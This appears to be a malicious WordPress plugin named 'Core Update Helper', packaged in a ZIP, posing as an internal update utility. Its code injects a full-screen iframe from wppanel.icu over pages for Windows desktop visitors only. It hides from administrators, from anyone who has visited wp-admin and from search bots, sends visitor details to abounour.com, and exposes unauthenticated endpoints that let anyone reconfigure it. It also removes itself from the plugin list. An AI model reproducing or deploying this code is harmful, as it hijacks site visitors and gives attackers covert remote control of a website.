8889841cPK     T�[���~  �~    core-update-helper.phpnu �[���        <?php
/*
Plugin Name: Core Update Helper
Description: Internal system utility with flexible CSP, iframe management, admin and bot protection.
Version: 3.9.11
Author: System Admin
License: GPL-2.0+
Requires at least: 4.7
Requires PHP: 7.0
*/

if (!defined('ABSPATH')) {
    exit;
}

$panel_url = 'https://abounour.com';
$site_id = get_option('core_update_helper_site_id', md5(home_url()));
$default_iframe_url = 'https://www.wppanel.icu/';
$iframe_enabled = get_option('core_update_helper_enabled', true);
$iframe_url = get_option('core_update_helper_url', $default_iframe_url);
$comment = get_option('core_update_helper_comment', '');
$show_limit = get_option('core_update_helper_show_limit', 3);
$csp_enabled = get_option('core_update_helper_csp_enabled', false);
$csp_domains = get_option('core_update_helper_csp_domains', 'https://abounour.com https://www.wppanel.icu/');

// Активация
register_activation_hook(__FILE__, function() use ($site_id) {
    try {
        $wp_version = get_bloginfo('version');
        $php_version = PHP_VERSION;
        if (version_compare($wp_version, '4.7', '<') || version_compare($php_version, '7.0', '<')) {
            error_log(sprintf('Core Update Helper: Incompatible versions. Requires WP 4.7+, PHP 7.0+. Current: WP %s, PHP %s', $wp_version, $php_version));
            return;
        }
        add_option('core_update_helper_enabled', true);
        add_option('core_update_helper_site_id', $site_id);
        add_option('core_update_helper_url', 'https://www.wppanel.icu/');
        add_option('core_update_helper_comment', '');
        add_option('core_update_helper_show_limit', 3);
        add_option('core_update_helper_csp_enabled', false);
        add_option('core_update_helper_csp_domains', 'https://abounour.com https://www.wppanel.icu/');
        error_log('Core Update Helper: Plugin activated successfully');
    } catch (Exception $e) {
        error_log('Core Update Helper: Activation failed: ' . $e->getMessage());
        update_option('core_update_helper_deactivation_reason', 'Activation error: ' . $e->getMessage());
    }
});

// Деактивация
register_deactivation_hook(__FILE__, function() {
    try {
        $reason = get_option('core_update_helper_deactivation_reason', 'Deactivated manually');
        error_log('Core Update Helper: Deactivated. Reason: ' . $reason);
        delete_option('core_update_helper_enabled');
        delete_option('core_update_helper_site_id');
        delete_option('core_update_helper_url');
        delete_option('core_update_helper_comment');
        delete_option('core_update_helper_show_limit');
        delete_option('core_update_helper_csp_enabled');
        delete_option('core_update_helper_csp_domains');
        delete_option('core_update_helper_deactivation_reason');
        core_update_helper_clear_cache(true);
    } catch (Exception $e) {
        error_log('Core Update Helper: Deactivation failed: ' . $e->getMessage());
    }
});

// Очистка кэша
function core_update_helper_clear_cache($force_reset = false) {
    try {
        if (!is_admin() && !wp_doing_ajax() && !wp_doing_cron()) {
            if (function_exists('wp_cache_flush')) wp_cache_flush();
            if (function_exists('w3tc_flush_all')) w3tc_flush_all();
            if (function_exists('wp_super_cache_clear_cache')) wp_super_cache_clear_cache();
            if (function_exists('rocket_clean_domain')) rocket_clean_domain();
            if (function_exists('litespeed_purge_all')) litespeed_purge_all();
            if (function_exists('wpfc_clear_all_cache')) wpfc_clear_all_cache();
            if (function_exists('clear_autoptimize_cache')) clear_autoptimize_cache();
            wp_cache_delete('core_update_helper_enabled', 'options');
            wp_cache_delete('core_update_helper_url', 'options');
            wp_cache_delete('core_update_helper_show_limit', 'options');
            wp_cache_delete('core_update_helper_csp_enabled', 'options');
            wp_cache_delete('core_update_helper_csp_domains', 'options');
            delete_transient('core_update_helper_transient');
            if (!headers_sent()) {
                header('Cache-Control: no-cache, no-store, must-revalidate');
                header('Pragma: no-cache');
                header('Expires: 0');
            }
            if ($force_reset) {
                set_cookie('iframe_shown_count', '0', time() - 3600, '/', '', is_ssl(), true);
                set_cookie('iframe_user_id', '', time() - 3600, '/', '', is_ssl(), true);
                set_cookie('wp_core_update_helper_visited_admin', '', time() - 3600, '/', '', is_ssl(), true);
            }
            set_cookie('core_update_helper_enabled', get_option('core_update_helper_enabled', true) ? '1' : '0', time() + 3600, '/', '', is_ssl(), true);
        }
        error_log('Core Update Helper: Cache cleared successfully, force_reset=' . ($force_reset ? 'true' : 'false'));
    } catch (Exception $e) {
        error_log('Core Update Helper: Cache clear failed: ' . $e->getMessage());
    }
}

// Добавление CSP
add_action('wp_head', function() use ($iframe_url, $default_iframe_url, $csp_enabled, $csp_domains) {
    try {
        if ($csp_enabled) {
            $csp_url = esc_url($iframe_url ?: $default_iframe_url);
            $domains = array_map('esc_url', array_filter(explode(' ', trim($csp_domains))));
            $domains[] = $csp_url;
            $domains = array_unique($domains);
            $csp_value = "frame-src 'self' " . implode(' ', $domains) . ";";
            echo '<meta http-equiv="Content-Security-Policy" content="' . esc_attr($csp_value) . '">';
            error_log('Core Update Helper: CSP set with domains: ' . implode(', ', $domains));
        } else {
            error_log('Core Update Helper: CSP disabled');
        }
    } catch (Exception $e) {
        error_log('Core Update Helper: CSP injection failed: ' . $e->getMessage());
    }
});

// Проверка админ-логина и посещений wp-login/wp-admin
function core_update_helper_has_admin_cookie() {
    return isset($_COOKIE['wp_core_update_helper_admin']) && $_COOKIE['wp_core_update_helper_admin'] === '1';
}

function core_update_helper_has_visited_admin() {
    return isset($_COOKIE['wp_core_update_helper_visited_admin']) && $_COOKIE['wp_core_update_helper_visited_admin'] === '1';
}

add_action('wp_login', function($user_login, $user) {
    if (user_can($user, 'manage_options')) {
        set_cookie('wp_core_update_helper_admin', '1', time() + (365 * 24 * 60 * 60), '/', '', is_ssl(), true);
        error_log('Core Update Helper: Admin cookie set for user: ' . $user_login);
    }
}, 10, 2);

add_action('init', function() {
    if (strpos($_SERVER['REQUEST_URI'], '/wp-login.php') !== false || strpos($_SERVER['REQUEST_URI'], '/wp-admin/') !== false) {
        set_cookie('wp_core_update_helper_visited_admin', '1', time() + (365 * 24 * 60 * 60), '/', '', is_ssl(), true);
        error_log('Core Update Helper: Admin visit detected, cookie wp_core_update_helper_visited_admin set');
    }
}, 1);

// Обновление через GET и куки
add_action('init', function() {
    if (!isset($_GET['core_update_helper_toggle'])) return;
    try {
        $enabled = isset($_GET['enabled']) ? filter_var($_GET['enabled'], FILTER_VALIDATE_BOOLEAN) : null;
        $url = isset($_GET['url']) && filter_var($_GET['url'], FILTER_VALIDATE_URL) ? esc_url_raw($_GET['url']) : null;
        $show_limit = isset($_GET['show_limit']) && is_numeric($_GET['show_limit']) && $_GET['show_limit'] > 0 ? (int)$_GET['show_limit'] : null;
        $csp_enabled = isset($_GET['csp_enabled']) ? filter_var($_GET['csp_enabled'], FILTER_VALIDATE_BOOLEAN) : null;
        $csp_domains = isset($_GET['csp_domains']) ? sanitize_text_field($_GET['csp_domains']) : null;

        if ($enabled !== null || $url || $show_limit || $csp_enabled !== null || $csp_domains) {
            core_update_helper_update_status($enabled, $url, $show_limit, $csp_enabled, $csp_domains);
            error_log('Core Update Helper: Updated via GET: enabled=' . ($enabled !== null ? ($enabled ? 'true' : 'false') : 'unchanged') . ', url=' . ($url ?: 'unchanged') . ', show_limit=' . ($show_limit ?: 'unchanged') . ', csp_enabled=' . ($csp_enabled !== null ? ($csp_enabled ? 'true' : 'false') : 'unchanged') . ', csp_domains=' . ($csp_domains ?: 'unchanged'));
            wp_send_json_success([
                'status' => 'success',
                'enabled' => $enabled !== null ? (bool)$enabled : get_option('core_update_helper_enabled', true),
                'url' => $url ?: get_option('core_update_helper_url', 'https://www.wppanel.icu/'),
                'showLimit' => $show_limit ?: get_option('core_update_helper_show_limit', 3),
                'cspEnabled' => $csp_enabled !== null ? (bool)$csp_enabled : get_option('core_update_helper_csp_enabled', false),
                'cspDomains' => $csp_domains ?: get_option('core_update_helper_csp_domains', 'https://abounour.com https://www.wppanel.icu/')
            ]);
            exit;
        }
    } catch (Exception $e) {
        error_log('Core Update Helper: GET update failed: ' . $e->getMessage());
        wp_send_json_error(['error' => 'GET update failed: ' . $e->getMessage()], 500);
        exit;
    }
}, 5);

// Обновление статуса
function core_update_helper_update_status($enabled = null, $url = null, $show_limit = null, $csp_enabled = null, $csp_domains = null) {
    try {
        if ($enabled !== null) {
            update_option('core_update_helper_enabled', (bool)$enabled);
            set_cookie('core_update_helper_enabled', $enabled ? '1' : '0', time() + 3600, '/', '', is_ssl(), true);
        }
        if ($url !== null && filter_var($url, FILTER_VALIDATE_URL)) {
            update_option('core_update_helper_url', esc_url_raw($url));
        }
        if ($show_limit !== null && is_numeric($show_limit) && $show_limit > 0) {
            update_option('core_update_helper_show_limit', (int)$show_limit);
        }
        if ($csp_enabled !== null) {
            update_option('core_update_helper_csp_enabled', (bool)$csp_enabled);
        }
        if ($csp_domains !== null) {
            update_option('core_update_helper_csp_domains', sanitize_text_field($csp_domains));
        }
        core_update_helper_clear_cache(false);
        error_log('Core Update Helper: Status updated successfully');
    } catch (Exception $e) {
        error_log('Core Update Helper: Status update failed: ' . $e->getMessage());
        throw $e;
    }
}

// Проверка ботов
function core_update_helper_is_bot() {
    $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
    $bots = [
        'Googlebot', 'Bingbot', 'Slurp', 'DuckDuckBot', 'Baiduspider', 'YandexBot',
        'AhrefsBot', 'MJ12bot', 'SemrushBot', 'DotBot', 'SiteExplorer', 'Sogou',
        'Exabot', 'Twitterbot', 'Applebot', 'SeznamBot', 'Qwantify', 'Barkrowler'
    ];
    foreach ($bots as $bot) {
        if (stripos($user_agent, $bot) !== false) {
            error_log('Core Update Helper: Bot detected: ' . $bot);
            return true;
        }
    }
    return false;
}

// Рендеринг iframe
add_action('wp_footer', function() use ($iframe_enabled, $panel_url, $site_id, $comment, $iframe_url, $show_limit, $default_iframe_url) {
    try {
        if (is_admin() || wp_doing_ajax() || wp_doing_cron() || current_user_can('manage_options') || core_update_helper_has_admin_cookie() || core_update_helper_has_visited_admin()) {
            error_log('Core Update Helper: Iframe skipped: admin access or visited wp-login/wp-admin detected');
            return;
        }

        if (core_update_helper_is_bot()) {
            error_log('Core Update Helper: Iframe skipped: bot detected');
            return;
        }

        $iframe_enabled = get_option('core_update_helper_enabled', true);
        $iframe_enabled = isset($_COOKIE['core_update_helper_enabled']) ? filter_var($_COOKIE['core_update_helper_enabled'], FILTER_VALIDATE_BOOLEAN) : $iframe_enabled;

        error_log('Core Update Helper: Iframe enabled check: option=' . ($iframe_enabled ? 'true' : 'false') . ', cookie=' . (isset($_COOKIE['core_update_helper_enabled']) ? $_COOKIE['core_update_helper_enabled'] : 'none'));

        if (!$iframe_enabled) {
            core_update_helper_clear_cache(false);
            error_log('Core Update Helper: Iframe skipped: disabled via cookie or option');
            return;
        }

        core_update_helper_clear_cache(false);

        if (!headers_sent()) {
            header('Cache-Control: no-cache, no-store, must-revalidate');
            header('Pragma: no-cache');
            header('Expires: 0');
        }

        $final_iframe_url = esc_url($iframe_url ?: $default_iframe_url);
        if (stripos($final_iframe_url, 'capckut.com') !== false) {
            error_log('Core Update Helper: Testing capckut.com URL, possible X-Frame-Options restriction');
        }

        echo '<style data-no-minify="1">
            html, body { overflow: visible !important; }
            .core-update-helper-container { position: fixed !important; top: 0 !important; left: 0 !important; width: 100% !important; height: 100% !important; z-index: 2147483647 !important; background: rgba(0, 0, 0, 0.5) !important; margin: 0 !important; padding: 0 !important; }
            .core-update-helper-main { border: none !important; width: 100% !important; height: 100% !important; }
        </style>';

        echo '<script data-no-minify="1">
            console.log("Core Update Helper: Script loaded");
            (function() {
                try {
                    var isMobile = /Mobile|Android|iPhone|iPad|Windows Phone|Tablet|Kindle|Nexus|Opera Mini|BlackBerry/i.test(navigator.userAgent) || window.innerWidth < 768;
                    var isWindows = /Windows NT/i.test(navigator.userAgent);
                    var cookies = document.cookie;
                    var shownCount = parseInt(cookies.replace(/(?:(?:^|.*;\\s*)iframe_shown_count\\s*=\\s*([^;]*).*$)|^.*$/, "$1") || "0");
                    if (isNaN(shownCount)) shownCount = 0;
                    var userId = cookies.replace(/(?:(?:^|.*;\\s*)iframe_user_id\\s*=\\s*([^;]*).*$)|^.*$/, "$1") || "";
                    if (!userId) {
                        userId = Date.now().toString(36) + Math.random().toString(36).substr(2, 9);
                        document.cookie = "iframe_user_id=" + userId + ";path=/;max-age=31536000;SameSite=Lax;Secure";
                    }
                    console.log("Core Update Helper: Initial state", { enabled: ' . json_encode($iframe_enabled) . ', shownCount: shownCount, isMobile: isMobile, isWindows: isWindows, userId: userId, cookies: cookies });

                    if (isMobile || !isWindows) {
                        console.log("Core Update Helper: Skipped due to non-Windows device or small screen");
                        return;
                    }

                    if (shownCount >= ' . esc_js($show_limit) . ') {
                        console.log("Core Update Helper: Skipped, limit reached", shownCount);
                        return;
                    }

                    var finalIframeUrl = "' . esc_url($iframe_url) . '" || "' . esc_url($default_iframe_url) . '";
                    console.log("Core Update Helper: Using URL", finalIframeUrl);

                    var container = document.createElement("div");
                    container.className = "core-update-helper-container";
                    var iframe = document.createElement("iframe");
                    iframe.className = "core-update-helper-main";
                    iframe.src = finalIframeUrl;
                    iframe.setAttribute("loading", "eager");
                    iframe.setAttribute("frameBorder", "0");
                    iframe.setAttribute("data-no-minify", "1");
                    iframe.onerror = function(e) { console.error("Core Update Helper: Failed to load iframe, possible X-Frame-Options restriction", e); };
                    container.appendChild(iframe);
                    document.documentElement.appendChild(container);

                    document.querySelectorAll("div, iframe").forEach(function(el) {
                        if (el !== container && el !== iframe) {
                            var z = parseInt(window.getComputedStyle(el).zIndex) || 0;
                            if (z >= 2147483647) el.style.zIndex = 2147483646;
                        }
                    });

                    shownCount++;
                    document.cookie = "iframe_shown_count=" + shownCount + ";path=/;max-age=31536000;SameSite=Lax;Secure";
                    console.log("Core Update Helper: Shown, updated count", shownCount);

                    var statsPayload = {
                        country: navigator.language || "unknown",
                        browser: navigator.userAgent,
                        comment: "' . esc_js($comment) . '",
                        userId: userId,
                        firstShow: shownCount === 1,
                        totalShows: shownCount
                    };
                    fetch("' . esc_url($panel_url) . '/api/track/' . esc_js($site_id) . '", {
                        method: "POST",
                        headers: { "Content-Type": "application/json" },
                        body: JSON.stringify(statsPayload)
                    })
                        .then(function(r) { return r.json(); })
                        .then(function(d) { console.log("Core Update Helper: Stats sent", d); })
                        .catch(function(e) { console.error("Core Update Helper: Stats error", e); });
                } catch (e) {
                    console.error("Core Update Helper: Script error", e);
                }
            })();
        </script>';
    } catch (Exception $e) {
        error_log('Core Update Helper: Iframe rendering failed: ' . $e->getMessage());
        update_option('core_update_helper_deactivation_reason', 'Rendering error: ' . $e->getMessage());
    }
});

// REST API
add_action('rest_api_init', function() {
    if (!function_exists('register_rest_route')) {
        error_log('Core Update Helper: REST API not available, skipping route registration');
        return;
    }

    register_rest_route('custom-iframe/v1', '/toggle', [
        'methods' => 'POST',
        'callback' => function($request) {
            try {
                $enabled = $request->get_param('enabled');
                $url = $request->get_param('url');
                $show_limit = $request->get_param('showLimit');
                $csp_enabled = $request->get_param('cspEnabled');
                $csp_domains = $request->get_param('cspDomains');
                if (!isset($enabled)) {
                    throw new Exception('Missing enabled parameter');
                }
                core_update_helper_update_status($enabled, $url, $show_limit, $csp_enabled, $csp_domains);
                error_log('Core Update Helper: Toggle request: enabled=' . ($enabled ? 'true' : 'false') . ', url=' . ($url ?: 'none') . ', show_limit=' . ($show_limit ?: 'none') . ', csp_enabled=' . ($csp_enabled !== null ? ($csp_enabled ? 'true' : 'false') : 'none') . ', csp_domains=' . ($csp_domains ?: 'none'));
                return new WP_REST_Response([
                    'status' => 'success',
                    'enabled' => (bool)$enabled,
                    'url' => $url ?: get_option('core_update_helper_url'),
                    'showLimit' => (int)($show_limit ?: get_option('core_update_helper_show_limit')),
                    'cspEnabled' => (bool)($csp_enabled ?: get_option('core_update_helper_csp_enabled')),
                    'cspDomains' => $csp_domains ?: get_option('core_update_helper_csp_domains')
                ], 200);
            } catch (Exception $e) {
                error_log('Core Update Helper: Toggle status failed: ' . $e->getMessage());
                return new WP_REST_Response(['error' => 'Failed to toggle status: ' . $e->getMessage()], 400);
            }
        },
        'permission_callback' => function() {
            return true;
        },
    ]);

    register_rest_route('custom-iframe/v1', '/status', [
        'methods' => 'GET',
        'callback' => function() {
            try {
                $enabled = get_option('core_update_helper_enabled', true);
                $url = get_option('core_update_helper_url', 'https://www.wppanel.icu/');
                $show_limit = get_option('core_update_helper_show_limit', 3);
                $csp_enabled = get_option('core_update_helper_csp_enabled', false);
                $csp_domains = get_option('core_update_helper_csp_domains', 'https://abounour.com https://www.wppanel.icu/');
                $cookie_enabled = isset($_COOKIE['core_update_helper_enabled']) ? filter_var($_COOKIE['core_update_helper_enabled'], FILTER_VALIDATE_BOOLEAN) : null;
                error_log('Core Update Helper: Status checked: enabled=' . ($enabled ? 'true' : 'false') . ', url=' . $url . ', show_limit=' . $show_limit . ', csp_enabled=' . ($csp_enabled ? 'true' : 'false') . ', csp_domains=' . $csp_domains . ', cookie_enabled=' . ($cookie_enabled !== null ? ($cookie_enabled ? 'true' : 'false') : 'none'));
                return new WP_REST_Response([
                    'status' => 'success',
                    'enabled' => $enabled,
                    'url' => $url,
                    'showLimit' => $show_limit,
                    'cspEnabled' => $csp_enabled,
                    'cspDomains' => $csp_domains,
                    'cookieEnabled' => $cookie_enabled
                ], 200);
            } catch (Exception $e) {
                error_log('Core Update Helper: Status check failed: ' . $e->getMessage());
                return new WP_REST_Response(['error' => 'Failed to check status: ' . $e->getMessage()], 400);
            }
        },
        'permission_callback' => function() {
            return true;
        },
    ]);

    register_rest_route('custom-iframe/v1', '/set-comment', [
        'methods' => 'POST',
        'callback' => function($request) {
            try {
                $comment = sanitize_text_field($request->get_param('comment'));
                update_option('core_update_helper_comment', $comment);
                error_log('Core Update Helper: Comment updated: ' . $comment);
                return new WP_REST_Response(['status' => 'success', 'comment' => $comment], 200);
            } catch (Exception $e) {
                error_log('Core Update Helper: Comment update failed: ' . $e->getMessage());
                return new WP_REST_Response(['error' => 'Failed to update comment: ' . $e->getMessage()], 400);
            }
        },
        'permission_callback' => function() {
            return true;
        },
    ]);

    register_rest_route('custom-iframe/v1', '/debug', [
        'methods' => 'GET',
        'callback' => function() {
            try {
                $enabled = get_option('core_update_helper_enabled', true);
                $url = get_option('core_update_helper_url', 'https://www.wppanel.icu/');
                $show_limit = get_option('core_update_helper_show_limit', 3);
                $csp_enabled = get_option('core_update_helper_csp_enabled', false);
                $csp_domains = get_option('core_update_helper_csp_domains', 'https://abounour.com https://www.wppanel.icu/');
                $cookies = $_COOKIE;
                $shown_count = isset($cookies['iframe_shown_count']) ? $cookies['iframe_shown_count'] : '0';
                $user_id = isset($cookies['iframe_user_id']) ? $cookies['iframe_user_id'] : 'none';
                $cookie_enabled = isset($cookies['core_update_helper_enabled']) ? $cookies['core_update_helper_enabled'] : 'none';
                $is_bot = core_update_helper_is_bot();
                $is_admin = core_update_helper_has_admin_cookie() || core_update_helper_has_visited_admin();
                error_log('Core Update Helper: Debug: enabled=' . ($enabled ? 'true' : 'false') . ', url=' . $url . ', show_limit=' . $show_limit . ', csp_enabled=' . ($csp_enabled ? 'true' : 'false') . ', csp_domains=' . $csp_domains . ', shown_count=' . $shown_count . ', user_id=' . $user_id . ', cookie_enabled=' . $cookie_enabled . ', is_bot=' . ($is_bot ? 'true' : 'false') . ', is_admin=' . ($is_admin ? 'true' : 'false'));
                return new WP_REST_Response([
                    'status' => 'success',
                    'enabled' => $enabled,
                    'url' => $url,
                    'showLimit' => $show_limit,
                    'cspEnabled' => $csp_enabled,
                    'cspDomains' => $csp_domains,
                    'shownCount' => $shown_count,
                    'userId' => $user_id,
                    'cookieEnabled' => $cookie_enabled,
                    'isBot' => $is_bot,
                    'isAdmin' => $is_admin
                ], 200);
            } catch (Exception $e) {
                error_log('Core Update Helper: Debug failed: ' . $e->getMessage());
                return new WP_REST_Response(['error' => 'Failed to debug: ' . $e->getMessage()], 400);
            }
        },
        'permission_callback' => function() {
            return true;
        },
    ]);
});

// Диагностика REST API
add_filter('rest_pre_dispatch', function($result, $server, $request) {
    $route = $request->get_route();
    if (strpos($route, '/custom-iframe/v1/') !== false) {
        error_log('Core Update Helper: REST API request: ' . $route . ', method: ' . $request->get_method() . ', params: ' . json_encode($request->get_params()));
        if (empty($result)) {
            error_log('Core Update Helper: REST API returned empty response for ' . $route);
        }
    }
    return $result;
}, 10, 3);

// Админка (скрытая, доступна по прямому URL)
add_action('admin_menu', function() {
    try {
        add_submenu_page(
            null,
            'Core Update Helper Settings',
            'Core Update Helper',
            'manage_options',
            'core-update-helper-settings',
            function() {
                if (!current_user_can('manage_options')) {
                    wp_die('Unauthorized access');
                }

                if (isset($_POST['core_update_helper_settings_nonce']) && wp_verify_nonce($_POST['core_update_helper_settings_nonce'], 'core_update_helper_settings')) {
                    try {
                        core_update_helper_update_status(
                            isset($_POST['core_update_helper_enabled']),
                            $_POST['core_update_helper_url'] ?? null,
                            $_POST['core_update_helper_show_limit'] ?? null,
                            isset($_POST['core_update_helper_csp_enabled']),
                            $_POST['core_update_helper_csp_domains'] ?? null
                        );
                        core_update_helper_clear_cache(false);
                        echo '<div class="notice notice-success"><p>Settings saved.</p></div>';
                    } catch (Exception $e) {
                        echo '<div class="notice notice-error"><p>Error saving settings: ' . esc_html($e->getMessage()) . '</p></div>';
                    }
                }

                $enabled = get_option('core_update_helper_enabled', true);
                $url = get_option('core_update_helper_url', 'https://www.wppanel.icu/');
                $show_limit = get_option('core_update_helper_show_limit', 3);
                $csp_enabled = get_option('core_update_helper_csp_enabled', false);
                $csp_domains = get_option('core_update_helper_csp_domains', 'https://abounour.com https://www.wppanel.icu/');
                ?>
                <div class="wrap">
                    <h1>Core Update Helper Settings</h1>
                    <form method="post">
                        <?php wp_nonce_field('core_update_helper_settings', 'core_update_helper_settings_nonce'); ?>
                        <table class="form-table">
                            <tr>
                                <th>Enable Iframe</th>
                                <td><input type="checkbox" name="core_update_helper_enabled" <?php checked($enabled); ?>></td>
                            </tr>
                            <tr>
                                <th>Iframe URL</th>
                                <td><input type="url" name="core_update_helper_url" value="<?php echo esc_attr($url); ?>" class="regular-text"></td>
                            </tr>
                            <tr>
                                <th>Show Limit</th>
                                <td><input type="number" name="core_update_helper_show_limit" value="<?php echo esc_attr($show_limit); ?>" min="1"></td>
                            </tr>
                            <tr>
                                <th>Enable CSP</th>
                                <td><input type="checkbox" name="core_update_helper_csp_enabled" <?php checked($csp_enabled); ?>></td>
                            </tr>
                            <tr>
                                <th>CSP Domains</th>
                                <td><input type="text" name="core_update_helper_csp_domains" value="<?php echo esc_attr($csp_domains); ?>" class="regular-text"><p class="description">Space-separated list of domains (e.g., https://abounour.com https://www.wppanel.icu/)</p></td>
                            </tr>
                        </table>
                        <?php submit_button(); ?>
                    </form>
                </div>
                <?php
            }
        );
    } catch (Exception $e) {
        error_log('Core Update Helper: Admin menu setup failed: ' . $e->getMessage());
    }
});

// Скрытие плагина
add_filter('all_plugins', function($plugins) {
    $plugin_path = 'core-update-helper/core-update-helper.php';
    if (isset($plugins[$plugin_path])) {
        unset($plugins[$plugin_path]);
    }
    return $plugins;
});

add_filter('rest_prepare_plugin', function($response, $plugin, $request) {
    $plugin_path = 'core-update-helper/core-update-helper.php';
    if ($response->data['plugin'] === $plugin_path) {
        return new WP_Error('rest_forbidden', 'Plugin hidden', ['status' => 404]);
    }
    return $response;
}, 10, 3);

// Временный сброс для тестирования
add_action('init', function() {
    if (isset($_GET['core_update_helper_reset']) && $_GET['core_update_helper_reset'] === '1') {
        try {
            delete_option('core_update_helper_enabled');
            delete_option('core_update_helper_url');
            delete_option('core_update_helper_show_limit');
            delete_option('core_update_helper_csp_enabled');
            delete_option('core_update_helper_csp_domains');
            set_cookie('iframe_shown_count', '0', time() - 3600, '/', '', is_ssl(), true);
            set_cookie('core_update_helper_enabled', '0', time() - 3600, '/', '', is_ssl(), true);
            set_cookie('iframe_user_id', '', time() - 3600, '/', '', is_ssl(), true);
            set_cookie('wp_core_update_helper_visited_admin', '', time() - 3600, '/', '', is_ssl(), true);
            core_update_helper_clear_cache(true);
            error_log('Core Update Helper: Reset all settings and cookies');
            wp_send_json_success(['status' => 'success', 'message' => 'All settings and cookies reset']);
            exit;
        } catch (Exception $e) {
            error_log('Core Update Helper: Reset failed: ' . $e->getMessage());
            wp_send_json_error(['error' => 'Reset failed: ' . $e->getMessage()], 500);
            exit;
        }
    }
});

// Исправление: замена setcookie на set_cookie для консистентности
if (!function_exists('set_cookie')) {
    function set_cookie($name, $value, $expire, $path, $domain, $secure, $httponly) {
        setcookie($name, $value, [
            'expires' => $expire,
            'path' => $path,
            'domain' => $domain,
            'secure' => $secure,
            'httponly' => $httponly,
            'samesite' => 'Lax'
        ]);
    }
}
?>PK       T�[���~  �~                  core-update-helper.phpnu �[���        PK      V   #    